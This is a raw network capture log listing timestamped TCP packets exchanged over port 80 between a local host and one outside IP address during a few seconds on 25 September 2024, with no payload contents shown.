Sep 25, 2024 16:03:23.696415901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696420908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696420908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696465969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696476936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696487904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696500063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696501017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696501017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696532965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696604967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696614981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696626902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696638107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696649075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696655035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696655035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696660042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696671963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696706057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696706057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.993809938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.046101093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.129251003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.133690119 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.134320974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.134349108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.134361982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.134398937 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.138860941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138878107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138890028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138900995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138912916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138923883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138936043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138942957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.138961077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138979912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.138991117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139003038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139014959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139025927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139025927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139025927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139036894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139048100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139060020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139065981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139069080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139069080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139077902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139089108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139100075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139111996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139115095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139115095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139143944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139166117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139183044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139193058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139199018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139199018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139204025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139215946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139234066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139245033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139250040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139252901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139252901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139256954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139261961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139271975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139276981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139281988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139287949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139298916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139309883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139317036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139328003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139334917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139334917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139341116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139352083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139363050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139375925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139391899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139391899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139394045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139405012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139415026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139429092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:24.139431953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139431953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.139786959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.370086908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:24.382616043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.555304050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.555324078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.557625055 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.630325079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630352020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630364895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630384922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630393982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.630398035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630409002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630420923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630435944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630448103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.630471945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.630471945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.630471945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.633359909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633383989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633397102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633400917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.633933067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633939981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633946896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633966923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.633991957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.633991957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.634454966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.708769083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708817005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708836079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708848953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708861113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708873987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.708945990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.708945990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.711865902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.711885929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.711899996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.711913109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.712004900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.712004900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.712147951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.712158918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.712169886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.712181091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.712219000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.714525938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790045023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790055990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790066957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790081024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790153980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790153980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790262938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790275097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790287971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790299892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790396929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790410042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790421009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790431976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790446043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790477991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.790482044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790482044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790482044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790482044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.790525913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.797214031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.797368050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.797652960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868469954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868501902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868513107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868525982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868567944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868597031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868608952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868619919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868736029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868753910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868765116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868850946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868864059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868874073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868899107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868899107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868899107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868899107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.868982077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.868993044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.869004011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.869163036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.869163036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.946827888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.946875095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.946886063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.946897984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.947139978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.947139978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.949903965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.949942112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.949955940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.949968100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950000048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950020075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950031996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950043917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950057983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.950082064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.950082064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.950082064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.950082064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.957794905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.957957983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:25.958412886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:25.999285936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.041829109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.041919947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.041939020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.041945934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.041948080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042047977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042052031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042361975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.042361975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.042404890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042418003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042429924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042449951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042463064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042475939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042486906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.042486906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.042490005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042501926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.042598009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.042598009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.043405056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.043823957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.119543076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119565010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119579077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119596004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119652987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119664907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119680882 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.119724035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.119733095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119734049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.119739056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119745970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119971991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119992018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.119998932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.120004892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.120007992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.120171070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.129579067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.129606962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.129771948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.171148062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.197869062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197906017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197917938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197935104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197959900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197972059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.197979927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.197984934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198021889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.198072910 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.198314905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198358059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198370934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198388100 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.198393106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198404074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198440075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.198479891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.198527098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198538065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198549032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.198622942 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.249411106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.276439905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276458979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276472092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276521921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276583910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276596069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276607990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.276628971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277534962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277545929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277553082 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.277553082 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.277553082 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.277556896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277569056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277580976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277591944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277602911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277614117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277625084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.277636051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.278601885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.355314970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355341911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355354071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355376005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355397940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355407000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355424881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355443001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355453968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355463982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355477095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355488062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355499029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355510950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355523109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355536938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.355541945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.355541945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.355541945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.355541945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.357423067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.364809990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.365055084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.369421005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.433567047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.433608055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.433619976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.433633089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.433974028 CEST	80	49715	172.94.3.25	192.168.2.6
